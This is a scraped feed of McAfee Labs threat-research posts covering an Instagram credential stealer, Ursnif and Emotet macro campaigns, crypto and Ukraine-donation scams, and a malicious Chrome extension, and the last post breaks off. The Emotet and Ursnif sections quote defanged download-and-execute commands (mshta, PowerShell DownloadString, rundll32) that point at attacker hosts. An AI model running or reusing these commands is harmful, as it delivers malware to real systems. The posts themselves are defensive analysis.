McAfee’s Mobile Research Team introduced a new Android malware targeting Instagram users who want to increase their followers or likes in the last post. As we researched more about this threat, we found another malware type that uses different technical methods to steal user’s credentials. The target is users who are not satisfied with the default functions provided by Instagram. Various Instagram modification application already exists for those users on the Internet. The new malware we found pretends to be a popular mod app and steals Instagram credentials. 

Behavior analysis 

Instander is one of the famous Instagram modification applications available for Android devices to help Instagram users access extra helpful features. The mod app supports uploading high-quality images and downloading posted photos and videos. 

The initial screens of this malware and Instander are similar, as shown below. 

Figure 1. Instander legitimate app(Left) and Mmalware(Right) 

Next, this malware requests an account (username or email) and password. Finally, this malware displays an error message regardless of whether the login information is correct. 

Figure 2. Malware requests account and password 

The malware steals the user’s username and password in a very unique way. The main trick is to use the Firebase API. First, the user input value is combined with [email protected] This value and static password(=kamalw20051) are then sent via the Firebase API, createUserWithEmailAndPassword. And next, the password process is the same. After receiving the user’s account and password input, this malware will request it twice. 

Figure 3. Main method to use Firebase API
Figure 3. Main method to use Firebase API

Since we cannot see the dashboard of the malware author, we tested it using the same API. As a result, we checked the user input value in plain text on the dashboard. 

Figure 4. Firebase dashboard built for testing
Figure 4. Firebase dashboard built for testing

According to the Firebase document, createUserWithEmailAndPassword API is to create a new user account associated with the specified email address and password. Because the first parameter is defined as email patterns, the malware author uses the above code to create email patterns regardless of user input values. 

It is an API for creating accounts in the Firebase so that the administrator can check the account name in the Firebase dashboard. The victim’s account and password have been requested as Firebase account name, so it should be seen as plain text without hashing or masking. 

Network traffic 

As an interesting point on the network traffic of the malware, this malware communicates with the Firebase server in Protobuf format in the network. The initial configuration of this Firebase API uses the JSON format. Although the Protobuf format is readable enough, it can be assumed that this malware author intentionally attempts to obfuscate the network traffic through the additional settings. Also, the domain used for data transfer(=www.googleapis.com) is managed by Google. Because it is a domain that is too common and not dangerous, many network filtering and firewall solutions do not detect it. 


As mentioned, users should always be careful about installing 3rd party apps. Aside from the types of malware we’ve introduced so far, attackers are trying to steal users’ credentials in a variety of ways. Therefore, you should employ security software on your mobile devices and always keep up to date. 

Fortunately, McAfee Mobile Security is able to detect this as Android/InstaStealer and protect you from similar threats. For more information visit  McAfee Mobile Security 

Indicators of Compromise 


  • 238a040fc53ba1f27c77943be88167d23ed502495fd83f501004356efdc22a39 

The post Instagram credentials Stealer: Disguised as Mod App appeared first on McAfee Blog.

✇McAfee Blogs

Phishing Campaigns featuring Ursnif Trojan on the Rise

By: McAfee Labs

Authored by Jyothi Naveen and Kiran Raj

McAfee Labs have been observing a spike in phishing campaigns that utilize Microsoft office macro capabilities. These malicious documents reach victims via mass spam E-mail campaigns and generally invoke urgency, fear, or similar emotions, leading unsuspecting users to promptly open them. The purpose of these spam operations is to deliver malicious payloads to as many people as possible.

A recent spam campaign was using malicious word documents to download and execute the Ursnif trojan. Ursnif is a high-risk trojan designed to record various sensitive information. It typically archives this sensitive data and sends it back to a command-and-control server.

This blog describes how attackers use document properties and a few other techniques to download and execute the Ursnif trojan.

Threat Summary

  • The initial attack vector is a phishing email with a Microsoft Word document attachment.
  • Upon opening the document, VBA executes a malicious shellcode
  • Shellcode downloads the remote payload, Ursnif, and invokes rundll32.exe to execute it.

Infection Chain

The malware arrives through a phishing email containing a Microsoft Word document as an attachment. When the document is opened and macros are enabled, Word downloads a DLL (Ursnif payload). The Ursnif payload is then executed using rundll32.exe

Figure 1- flowchart of infection chain
Figure 1- flowchart of infection chain

Word Analysis

Macros are disabled by default and the malware authors are aware of this and hence present an image to entice the victims into enabling them.

Figure 2- Image of what the user sees upon opening the document
Figure 2- Image of what the user sees upon opening the document

VBA Macro Analysis of Word Document

Analyzing the sample statically with ‘oleId’ and ‘olevba’ indicates the suspicious vectors..

Figure 3- Oleid output
Figure 3- Oleid output
Figure 4- Olevba output
Figure 4- Olevba output

The VBA Macro is compatible with x32 and x64 architectures and is highly obfuscated as seen in Figure-5

Figure 5- Obfuscated VBA macro
Figure 5- Obfuscated VBA macro

To get a better understanding of the functionality, we have de-obfuscated the contents in the 2 figures shown below.

Figure 6- De-obfuscated VBA macro (stage 1)
Figure 6- De-obfuscated VBA macro (stage 1)
Figure 7- De-obfuscated VBA macro (stage 2)
Figure 7- De-obfuscated VBA macro (stage 2)

An interesting characteristic of this sample is that some of the strings like CLSID, URL for downloading Ursnif, and environment variables names are stored in custom document properties in reverse. As shown in Figure-7, VBA function “ActiveDocument.CustomDocumentProperties()” is used to retrieve the properties and uses “StrReverse” to reverse the contents. 

We can see the document properties in Figure-8  

Figure 8- Document properties
Figure 8- Document properties

Payload Download and Execution: 

The malicious macro retrieves hidden shellcode from a custom property named “Company” using the “cdec” function that converts the shellcode from string to decimal/hex value and executes it. The shellcode is shown below. 

Figure 9- Raw Company property
Figure 9- Raw Company property

The shellcode is written to memory and the access protection is changed to PAGE_EXECUTE_READWRITE. 

Figure 10- Code of VirtualProtect
Figure 10- Code of VirtualProtect
Figure 11- Shellcode’s memory and protection after calling VirtualProtect()
Figure 11- Shellcode’s memory and protection after calling VirtualProtect()

After adding the shellcode in memory, the environment variable containing the malicious URL of Ursnif payload is created. This Environment variable will be later used by the shellcode. 

Figure 12- Environment variable set in Winword.exe space
Figure 12- Environment variable set in Winword.exe space

The shellcode is executed with the use of the SetTimer API. SetTimer creates a timer with the specified time-out value mentioned and notifies a function when the time is elapsed. The 4th parameter used to call SetTimer is the pointer to the shellcode in memory which will be invoked when the mentioned time is elapsed. 

Figure 13- SetTimer function (Execution of shellCode)
Figure 13- SetTimer function (Execution of shellCode)

The shellcode downloads the file from the URL stored in the environmental variable and stores it as ” y9C4A.tmp.dll ” and executes it with rundll32.exe. 

URL  hxxp://docmasterpassb.top/kdv/x7t1QUUADWPEIQyxM6DT3vtrornV4uJcP4GvD9vM/ 
CMD  rundll32 “C:\Users\user\AppData\Local\Temp\y9C4A.tmp.dll”,DllRegisterServer 
Figure 14- Exports of Downloaded DLL
Figure 14- Exports of Downloaded DLL

After successful execution of the shellcode, the environment variable is removed. 

Figure 15- Removal of Environment Variable
Figure 15- Removal of Environment Variable


Main Word Document  6cf97570d317b42ef8bfd4ee4df21d217d5f27b73ff236049d70c37c5337909f  McAfee LiveSafe and Total Protection  X97M/Downloader.CJG 
Downloaded dll  41ae907a2bb73794bb2cff40b429e62305847a3e1a95f188b596f1cf925c4547  McAfee LiveSafe and Total Protection  Ursnif-FULJ 
URL to download dll  hxxp://docmasterpassb.top/kdv/x7t1QUUADWPEIQyxM6DT3vtrornV4uJcP4GvD9vM/  WebAdvisor  Blocked 

MITRE Attack Framework 

Technique ID  Tactic  Technique Details  Description 
T1566.001  Initial Access  Spear phishing Attachment  Manual execution by user 
T1059.005  Execution  Visual Basic  Malicious VBA macros 
T1218.011  Defense Evasion  Signed binary abuse  Rundll32.exe is used 
T1027  Defense Evasion  Obfuscation techniques  VBA and powershell base64 executions 
T1086  Execution  Powershell execution  PowerShell command abuse 


Macros are disabled by default in Microsoft Office applications, we suggest keeping it that way unless the document is received from a trusted source. The infection chain discussed in the blog is not limited to Word or Excel. Further threats may use other live-off-the-land tools to download its payloads.  

McAfee customers are protected against the malicious files and sites detailed in this blog with McAfee LiveSafe/Total Protection and McAfee Web Advisor. 

The post Phishing Campaigns featuring Ursnif Trojan on the Rise appeared first on McAfee Blog.

✇McAfee Blogs

Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency

By: McAfee

By Oliver Devane 

Update: In the past 24 hours (from time of publication)  McAfee has identified 15 more scam sites bringing the total to 26. The combined value of the wallets shared on these sites is over $1,300,000 which is an increase of roughly $1,000,000 since this blog was last published. This highlights the scale of this current scam campaign. The table within this blog has been updated to include the new sites and crypto-wallets.

McAfee has identified several Youtube channels which were live-streaming a modified version of a live stream called ‘The B Word’ where Elon Musk, Cathie Wood, and Jack Dorsey discuss various aspects of cryptocurrency.  

The modified live streams make the original video smaller and put a frame around it advertising malicious sites that it claims will double the amount of cryptocurrency you send them. As the topic of the video is on cryptocurrency it adds some legitimacy to the websites being advertised.  

The original video is shown below on the left and a modified one which includes a reference to a scam site is shown on the right.  

We identified several different streams occurring at a similar same time. The images of some are shown below: 

The YouTube streams advertised several sites which shared a similar theme. They claim to send cryptocurrency worth double the value which they’ve received. For example, if you send 1BTC you will receive 2BTC in return. One of the sites frequently asked questions (FAQ) is shown below: 

Here are some more examples of the scam sites we discovered: 

The sites attempt to trick the visitors into thinking that others are sending cryptocurrency to it by showing a table with recent transactions. This is fake and is generated by JavaScript which creates random crypto wallets and amounts and then adds these to the table. 

The wallets associated with the malicious sites have received a large number of transactions with a combined value of $280,000 as of 5 PM UTC on the 5th of May 2022 

Scam Site  Crypto Type  Wallet  Value as on 5PM UTC 5th May 2022 
22ark-invest[.]org  ETH  0x820a78D8e0518fcE090A9D16297924dB7941FD4f  $25,726.46 
22ark-invest[.]org  BTC  1Q3r1TzwCwQbd1dZzVM9mdFKPALFNmt2WE  $29,863.78 
2xEther[.]com  ETH  0x5081d1eC9a1624711061C75dB9438f207823E694  $2,748.50 
2x-musk[.]net  ETH  0x18E860308309f2Ab23b5ab861087cBd0b65d250A  $10,409.13 
2x-musk[.]net  BTC  17XfgcHCfpyYMFdtAWYX2QcksA77GnbHN9  $4,779.47 
arkinvest22[.]net  ETH  0x2605dF183743587594A3DBC5D99F12BB4F19ac74  $11,810.57 
arkinvest22[.]net  BTC  1GLRZZHK2fRrywVUEF83UkqafNV3GnBLha  $5,976.80 
doublecrypto22[.]com  ETH  0x12357A8e2e6B36dd6D98A2aed874D39c960eC174  $0.00 
doublecrypto22[.]com  BTC  1NKajgogVrRYQjJEQY2BcvZmGn4bXyEqdY  $0.00 
elonnew[.]com  ETH  0xAC9275b867DAb0650432429c73509A9d156922Dd  $0.00 
elonnew[.]com  BTC  1DU2H3dWXbUA9mKWuZjbqqHuGfed7JyqXu  $0.00 
elontoday[.]org  ETH  0xBD73d147970BcbccdDe3Dd9340827b679e70d9d4  $18,442.96 
elontoday[.]org  BTC  bc1qas66cgckep3lrkdrav7gy8xvn7cg4fh4d7gmw5  $0.00 
Teslabtc22[.]com  ETH  0x9B857C44C500eAf7fAfE9ed1af31523d84CB5bB0  $27,386.69 
Teslabtc22[.]com  BTC  18wJeJiu4MxDT2Ts8XJS665vsstiSv6CNK  $17,609.62 
tesla-eth[.]org  ETH  0x436F1f89c00f546bFEf42F8C8d964f1206140c64  $5,841.84 
tesla-eth[.]org  BTC  1CHRtrHVB74y8Za39X16qxPGZQ12JHG6TW  $132.22 
teslaswell[.]com  ETH  0x7007Fa3e7dB99686D337C87982a07Baf165a3C1D  $9.43 
teslaswell[.]com  BTC  bc1qdjma5kjqlf7l6fcug097s9mgukelmtdf6nm20v  $0.00 
twittergive[.]net  ETH  0xB8e257C18BbEC93A596438171e7E1E77d18671E5  $25,918.90 
twittergive[.]net  BTC  1EX3dG9GUNVxoz6yiPqqoYMQw6SwQUpa4T  $99,123.42 

Scammers have been using social media sites such as Twitter and Youtube to attempt to trick users into parting ways with their cryptocurrency for the past few years. McAfee urges its customers to be vigilant and if something sounds too good to be true then it is most likely not legitimate.  

Our customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee Web Advisor  

Type  Value  Product  Blocked 
URL – Crypto Scam  twittergive[.]net  McAfee WebAdvisor  YES 
URL – Crypto Scam  tesla-eth[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  22ark-invest[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  2xEther[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  Teslabtc22[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  elontoday[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  elonnew[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  teslaswell[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  2x-musk[.]net  McAfee WebAdvisor  YES 
URL – Crypto Scam  doublecrypto22[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  arkinvest22[.]net  McAfee WebAdvisor  YES 


The post Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency appeared first on McAfee Blog.

✇McAfee Blogs

Scammers are Exploiting Ukraine Donations

By: McAfee Labs

Authored by Vallabh Chole and Oliver Devane

Scammers are very quick at reacting to current events, so they can generate ill-gotten gains. It comes as no surprise that they exploited the current events in Ukraine, and when the Ukrainian Twitter account tweeted Bitcoin and Ethereum wallet addresses for donations we knew that scammers would use this as a lure for their victims.

This blog covers some of the malicious sites and emails McAfee has observed in the past few weeks.

Crypto wallet donation scams

A crypto donation scam occurs when perpetrators create phishing websites and emails that contain cryptocurrency wallets asking for donations. We have observed several new domains being created which perform this malicious activity, such as ukrainehelp[.]world and ukrainethereum[.]com.


Below is a screenshot of Ukrainehelp[.]world, which is a phishing site asking for crypto donations for UNICEF. The website contains the BBC logo and several crypto wallet addresses.

While investigating this site, we observed that the Ethereum wallet used use was also associated with an older crypto scam site called eth-event20.com. The image below shows the current value of the crypto wallet which is worth $114,000. Interestingly this wallet transfers all its coins to 0xc95eb2aa75260781627e7171c679a490e2240070 which in turn transfers to 0x45fb09468b17d14d2b9952bc9dcb39ee7359e64d. The final wallet currently has 313 ETH which is worth over $850,000. This shows the large sums of money scammers can generate with phishing sites.


Ukrainethereum[.]com is another crypto scam site, but what makes this one interesting is the features it contains to gain the victim’s confidence in trusting the website such as a fake chatbox and a fake donation verifier.

Fake Chat

The image above shows the chatbox on the left-hand side which displays several messages. At first glance, it would appear as if other users are on the website and talking, but when you reload the site it shows the same messages. This is due to the chat messages being displayed from a list that is used to populate the website with JavaScript code as shown on the right-hand side.  

Fake Donation Verifier 

The site contains a donation checker so the victim can see if their donation was received, as shown below. 


  1. The first image on left shows the verification box for donation to check if it is completed or not 
  2. Upon clicking ‘Check’ the victim is shown a message to say the donation was received.  
  3. What occurs, is upon clicking ‘Check’ the JavaScript code changes the website code so that it displays the ‘Thanks!’ message, and no actual check is performed. 

Phishing Email 

The following image shows one of the examples of phish emails we have observed. 

The email is not addressed to anyone specifically as they are mass-mailed to multiple email addresses. The wallet IDs in the email are not associated with the official Ukraine Twitter and are owned by scammers. As you can see in the image above, they are similar as the first 3 characters are the same. This could lead to some users believing it is legitimate. Therefore, it’s important to check that the wallet address is identical.  

Credit Card Information Stealer 

This is the most common type of phishing website. The goal of these sites it entices the victim into entering their credit card and personally identifiable information (PII) data by making them believe that the site being visited is official. This section contains details on one such website we have found using Ukraine donations as a lure.  


The image below shows the phishing site. The website was used to save the children’s NGO links and images, which made it appear more genuine. You can see that is it asking the victim to enter their credit card and billing information.  

Once the data is entered, and the victim clicks on ‘Donate’, the information will be submitted via the form and will be sent to scammers so they can then use or sell the information. 

We observed that a few days after the website was created, the scammers change the site code so that it became a Mcdonald’s phishing site targeting the Arab Emirates. This was a surprising change in tactics. 

The heatmap below shows the detections McAfee has observed around the world for the malicious sites mentioned in this blog. 


How to identify a phishing email? 

  • Look for the domain from where you received mail, attackers masquerade it. 
  • Use McAfee Web Advisor as this prevents you from accessing malicious sites 
  • If McAfee Web Advisor is not used, links can be manually checked at https://trustedsource.org/. 
  • Perform a Web Search of any crypto wallet addresses. If the search returns no or a low number of hits it is likely fraudulent. 
  • Check for poor grammar and suspicious logos  
  • For more detailed advice please visit McAfee’s How to recognize and protect yourself from phishing page 

How to identify phishing websites? 

  • Use McAfee Web Advisor as this prevents you from accessing malicious sites 
  • Look at the URL of the website which you are visiting and make sure it is correct. Look for alterations such as logln-paypal.com instead of login.paypal.com 
  • If you are unsure that the website is legitimate. Perform a Web search of the URL. You will find many results If they are genuine. If the search returns no or a low number of hits it is likely fraudulent 
  • Hyperlinks and site addresses that do not match the sender – Hover your mouse over the hyperlink or call-to-action button in the email. Is the address shortened or is it different from what you would expect from the sender? It may be a spoofed address from the 
  • Verify if the URL and Title of the page match. Such as the website, razonforukraine[.]com with a title reading “McDonald’s Delivery” 

For general cyber scam, education click here

McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee Web Advisor 


Type  Value  Product  Detected 
URL – Phishing Sites   ukrainehelp[.]world  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   ukrainethereum[.]com  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   unitedhelpukraine[.]kiev[.]ua/  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   donationukraine[.]io/donate  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   help-ukraine-compaign[.]com/shop  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   ukrainebitcoin[.]online/  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   ukrainedonation[.]org/donate  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   ukrainewar[.]support  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   sendhelptoukraine[.]com  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   worldsupportukraine[.]com  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   paytoukraine[.]space  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   razonforukraine[.]com  McAfee WebAdvisor   Blocked 


The post Scammers are Exploiting Ukraine Donations appeared first on McAfee Blog.

✇McAfee Blogs

Imposter Netflix Chrome Extension Dupes 100k Users

By: McAfee Labs

Authored by Oliver Devane, Vallabh Chole, and Aayush Tyagi 

McAfee has recently observed several malicious Chrome Extensions which, once installed, will redirect users to phishing sites, insert Affiliate IDs and modify legitimate websites to exfiltrate personally identifiable information (PII) data. According to the Google Extension Chrome Store, the combined install base is 100,000 

McAfee Labs has observed these extensions are prevalent in USA, Europe and India as we can observe in the heatmap below. 

The perpetrator targets over 1,400 domains, where 100 of them belong to the top 10,000 Alexa ranking including hbomax.com, hotels.com and expedia.com.

One extension, ‘Netflix Party’, mimics the original Netflix Party extension, which allows groups of people to watch Netflix shows at the same time. However, this version monitors all the websites you visit and performs several malicious activities.  

The malicious actor behind the extensions has created several Twitter accounts and fake review websites to deceive users into trusting and installing the extensions. 

The victim will be tricked into installing the extension and their data will be stolen when browsing a gift card site.  

The details of each step are as follows: 

  1. The perpetrator creates malicious extensions and adds them to the Chrome Extension Store. They create fake websites to review the extensions and fake Twitter accounts to publicize them.  
  2. A victim may perform a web or Twitter search for Netflix Party, read the review and click on a link that will lead them to the Google Chrome Store.  
  3. They click to install the Extension and accept the permissions. 
  4. The victim will either perform a web search or directly navigate to the gift card website. The Extension will identify the website and redirect them to the phishing page. 
  5. The victim will enter their gift card information on the phishing page. 
  6. The gift card information is posted to the server to which the malicious actor has access. They can now use or sell the stolen data and the victim will lose their funds. 

Technical Analysis 

This section contains the technical analysis of the malicious chrome extension “bncibciebfeopcomdaknelhcohiidaoe“. 


The manifest.json file contains the permissions of the extension. The ‘unsafe-eval’ permission in the ‘content_security_policy’ and the allowed use of content.js on any website visited by the user is of particular concern 


When the extension is installed, the background.js script will be loaded. This file uses a simple obfuscation technique of putting all the code on one line which makes it difficult to read. This is easily cleaned up by using a code beautifier and the image below shows the obfuscated script on the first line and the cleaned-up code below the red arrow.  

This script accesses https://accessdashboard[.]live to download a script and store it as variable ‘code’ in Chromes local storage. This stored variable is then referenced in the content.js script, which is executed on every visited website.  


After beautification, we see the code will read the malicious script from the ‘code’ variable which was previously stored. 


The malicious code has three main functions, redirection for phishing, modifying of cookies to add AffiliateIDs, and modifying of website code to add chat windows.  

Redirection for Phishing 

Redirection for phishing works by checking if the URL being accessed matches a list, and conditionally redirects to a malicious IP that hosts the phishing site.  

URLs monitored are: 

  • https[:]//www.target.com/guest/gift-card-balance 
  • https[:]//www.macys.com/account/giftcardbalance 
  • https[:]//www.nike.com/orders/gift-card-lookup 
  • https[:]//www.nordstrom.com/nordstrom-gift-cards 
  • https[:]//www.sephora.com/beauty/giftcards 
  • https[:]//www.sephoragiftcardbalance.com 
  • https[:]//balance.amexgiftcard.com 
  • https[:]//prepaidbalance.americanexpress.com/GPTHBIWeb/validateIPAction.do?clientkey=retail%20sales%20channel 
  • https[:]//amexprepaidcard.com 
  • [:]//secure4.store.apple.com/shop/giftcard/balance 

Upon navigating to one of the above sites, the user will be redirected to 164[.]90[.]144[.]88. An observant user would notice that the URL would have changed to an IP address, but some users may not. 

The image below shows the Apple Phishing site and the various phishing kits being hosted on this server. 

The phishing sites share similar codes. If a user enters their gift card information, the data will be posted to A network capture of the post request is shown below: 

Modifying of cookies to add AffiliateIDs 

The second malicious function contains AIPStore which is a dictionary containing a list of URLs and their respective monetizing sites which provide affiliate IDs. This function works by loading new tabs which will result in cookies being set on the visited sites. The flow below describes how the extension will work. 

  1. A user navigates to a retail website 
  2. If the retail website is contained in the AIPStore keymap, the extension will load a new tab with a link to a monetizing site which sets the cookie with the affiliate ID. The new tab is then closed, and the cookie will persist.  
  3. The user will be unaware that a cookie would have been set and they will continue to browse the website. 
  4. Upon purchasing any goods, the Affiliate ID will be recognized by the site vendor and commission will be sent to the Affiliate ID owner which would be the Malicious Actor 

The left image below shows the original site with no affiliate cookie, the one on the right highlights the cookie that has been added by the extension. 

Chat Windows 

The final function checks a list of URLs being accessed and if they match, a JS script will be injected into the HTML code which will result in a chat window being displayed. The image below shows the injected script and the chat window. 

The chat window may be used by the malicious actor to request PII data, credit card, and product key information. 


This threat is a good example of the lengths malicious actors will go to trick users into installing malware such as creating Twitter accounts and fake review websites.  

McAfee advises its customers to be cautious when installing Chrome Extensions and pay attention to the permissions that they are requesting.  

The permissions will be shown by Chrome before the installation of the Extension. Customers should take extra steps to verify the authenticity if the extension is requesting permissions that enable it to run on every website you visit such as the one detailed in this blog 

McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee WebAdvisor as shown below.  

The Malicious code within the extension is detected as Phish-Extension. Please perform a ‘Full’ scan via the product. 

Type  Value  Product  Detected 
URL – Phishing Sites*  McAfee WebAdvisor  Blocked 
Chrome Extension  netflix-party – bncibciebfeopcomdaknelhcohiidaoe  Total Protection and LiveSafe  Phish-Extension 
Chrome Extension  teleparty – flddpiffdlibegmclipfcnmaibecaobi  Total Protection and LiveSafe  Phish-Extension 
Chrome Extension  hbo-max-watch-party – dkdjiiihnadmgmmfobidmmegidmmjobi  Total Protection and LiveSafe  Phish-Extension 
Chrome Extension  prime-watch-party – hhllgokdpekfchhhiknedpppjhgicfgg  Total Protection and LiveSafe  Phish-Extension 
Chrome Extension  private-watch-party – maolinhbkonpckjldhnocgilkabpfodc  Total Protection and LiveSafe  Phish-Extension 
Chrome Extension  hotstar-ad-blocker – hacogolfhplehfdeknkjnlblnghglfbp  Total Protection and LiveSafe  Phish-Extension 
Chrome Extension  hbo-ad-blocker – cbchmocclikhalhkckeiofpboloaakim  Total Protection and LiveSafe  Phish-Extension 
Chrome Extension  blocksite – pfhjfcifolioiddfgicgkapbkfndaodc  Total Protection and LiveSafe  Phish-Extension 
Chrome Extension  hbo-enhanced – pkdpclgpnnfhpapcnffgjbplfbmoejbj  Total Protection and LiveSafe  Phish-Extension 
Chrome Extension  hulu-watch-party – hkanhigmilpgifamljmnfppnllckkpda  Total Protection and LiveSafe  Phish-Extension 
Chrome Extension  disney-plus-watch-party – flapondhpgmggemifmemcmicjodpmkjb  Total Protection and LiveSafe  Phish-Extension 
Chrome Extension  spotify-ad-blocker – jgofflaejgklikbnoefbfmhfohlnockd  Total Protection and LiveSafe  Phish-Extension 
Chrome Extension  ott-party – lldibibpehfomjljogedjhaldedlmfck  Total Protection and LiveSafe  Phish-Extension 



The post Imposter Netflix Chrome Extension Dupes 100k Users appeared first on McAfee Blog.

✇McAfee Blogs

Why Am I Getting All These Notifications on my Phone?

By: McAfee Labs

Authored by Oliver Devane and Vallabh Chole  

Notifications on Chrome and Edge, both desktop browsers, are commonplace, and malicious actors are increasingly abusing this feature. McAfee previously blogged about how to change desktop browser settings to stop malicious notifications. This blog focuses on Chrome notifications on Android mobile devices such as phones and tablets, and how McAfee Mobile Security protects users from malicious sites leveraging these notifications.  

Where do these notifications come from? 

Most users are unaware of the source of these notifications. Permission is granted when a user clicks ‘Allow’ on a prompt within Android Chrome. 

Many malicious websites use language and images like the one above that entice the user to click ‘Allow’ such as ‘Just one more step! Click “Allow” to continue. Once allow is clicked, the website is added to a site permissions list, which will enable it to send notifications.  

What do they look like? 

The notifications will look like a usual Android notification which you will be used to seeing such as you have a new WhatsApp message or email. To identify the source of the notification, we need to look for the application name which is like the one highlighted in the red box below.  

The image above shows the notification came from Chrome and it is from the website premiumbros[.]com. This is something you should pay attention to as it will be needed when you want to stop annoying notifications.  

Why are some of them malicious? 

Some notifications like the ones in this blog are malicious as they attempt to trick users into believing that their mobile device is infected with a virus and some action is required. When the users click the notification, Chrome will load a website which will present them with a fake warning like the example below: 

Clicking either Cancel or Update Now on the above website will result in the same behavior. The browser will redirect the user to a google play store app so that they can download and install it.  

The malicious websites will flood your phone with several notifications. The screenshot below shows an example of this: 

Why do malicious actors do this? 

You may ask yourself, why do malicious actors try to get me to install a google play application? The people behind these scams receive a commission when these applications are installed on devices. They rely on deceptive tactics to trick users into installing them to maximize profits. 

How can I remove notifications? 

To remove a website’s notification permission, you need to change a Chrome setting. 

1- Find out the name of the website which is sending these notifications. This can be done by looking at the notification and noting down the name of the website. If we use this blog as an example, it would be premiumbros[.]com

2- Open the Chrome browser app which can be found by performing the following search: 

3- Click the three … on the top right hand of the application 

4- Scroll down and click on settings 

5- Click on Notifications 

6- Scroll down until you find the website which you identified in step 1 

7- Pres the blue radio button so it turns grey 

8- Notifications will now be disabled for that website. If you want to block multiple websites, click the radio button for them as well.  

How does McAfee Protect me? 

McAfee customers who have McAfee Mobile Security are protected against these malicious websites as long as they enable the ‘Safe Browsing’ feature within the application.  

Upon trying to access a malicious website such as the one in the blog it will be blocked as shown in the image below: 


Please read this guide on enabling the Safe Browsing feature within the Mobile Security Application. 

The post Why Am I Getting All These Notifications on my Phone? appeared first on McAfee Blog.

✇McAfee Blogs

Emotet’s Uncommon Approach of Masking IP Addresses

By: McAfee Labs

Authored By: Kiran Raj

In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and octal formats to represent IP address which is usually represented by decimal formats. An example of this is shown below:

Hexadecimal format: 0xb907d607

Octal format: 0056.0151.0121.0114

Decimal format:

This change in format might evade some AV products relying on command line parameters but McAfee was still able to protect our customers. This blog explains this new technique.

Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee
Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee

Threat Summary

  1. The initial attack vector is a phishing email with a Microsoft Excel attachment. 
  2. Upon opening the Excel document and enabling editing, Excel executes a malicious JavaScript from a server via mshta.exe 
  3. The malicious JavaScript further invokes PowerShell to download the Emotet payload. 
  4. The downloaded Emotet payload will be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.

Maldoc Analysis

Below is the image (figure 2) of the initial worksheet opened in excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.

On examining the excel spreadsheet further, we can see a few cell addresses added in the Named Manager window. Cells mentioned in the Auto_Open value will be executed automatically resulting in malicious code execution.

Figure 3- Named Manager and Auto_Open triggers
Figure 3- Named Manager and Auto_Open triggers

Below are the commands used in Hexadecimal and Octal variants of the Maldocs

Hexadecimal cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html http://185[.]7[.]214[.]7/fer/fer.html
Octal cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html http://46[.]105[.]81[.]76/c.html


On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript which is within an html file.

Figure 4: Process tree of excel execution
Figure 4: Process tree of excel execution

The downloaded file fer.html containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code

Figure 5- Image of HTML page viewed on browser
Figure 5- Image of HTML page viewed on a browser

The Malicious JavaScript invokes PowerShell to download the Emotet payload from “hxxp://185[.]7[.]214[.]7/fer/fer.png” to the following path “C:\Users\Public\Documents\ssd.dll”.

cmd line (New-Object Net.WebClient).DownloadString(‘http://185[.]7[.]214[.]7/fer/fer.png’)

The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server

cmd line cmd  /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString


XLS 06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c McAfee LiveSafe and Total Protection X97M/Downloader.nn
DLL a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3 McAfee LiveSafe and Total Protection


HTML URL http://185[.]7[.]214[.]7/fer/fer.html


WebAdvisor Blocked
DLL URL http://185[.]7[.]214[.]7/fer/fer.png


WebAdvisor Blocked


T1566 Initial access Phishing attachment Initial maldoc uses phishing strings to convince users to open the maldoc
T1204 Execution User Execution Manual execution by user
T1071 Command and Control Standard Application Layer Protocol Attempts to connect through HTTP
T1059 Command and Scripting Interpreter Starts CMD.EXE for commands execution Excel uses cmd and PowerShell to execute command


Signed Binary Proxy Execution Uses RUNDLL32.EXE and MSHTA.EXE to load library rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript


Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.

The post Emotet’s Uncommon Approach of Masking IP Addresses appeared first on McAfee Blog.

✇McAfee Blogs


By: McAfee Labs

By Sriram P & Lakshya Mathur 

Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware, and many more. Recently at McAfee Labs, we observed Hancitor Doc VBA (Visual Basic for Applications) samples dropping the payload using the Windows clipboard through Selection.Copy method. 

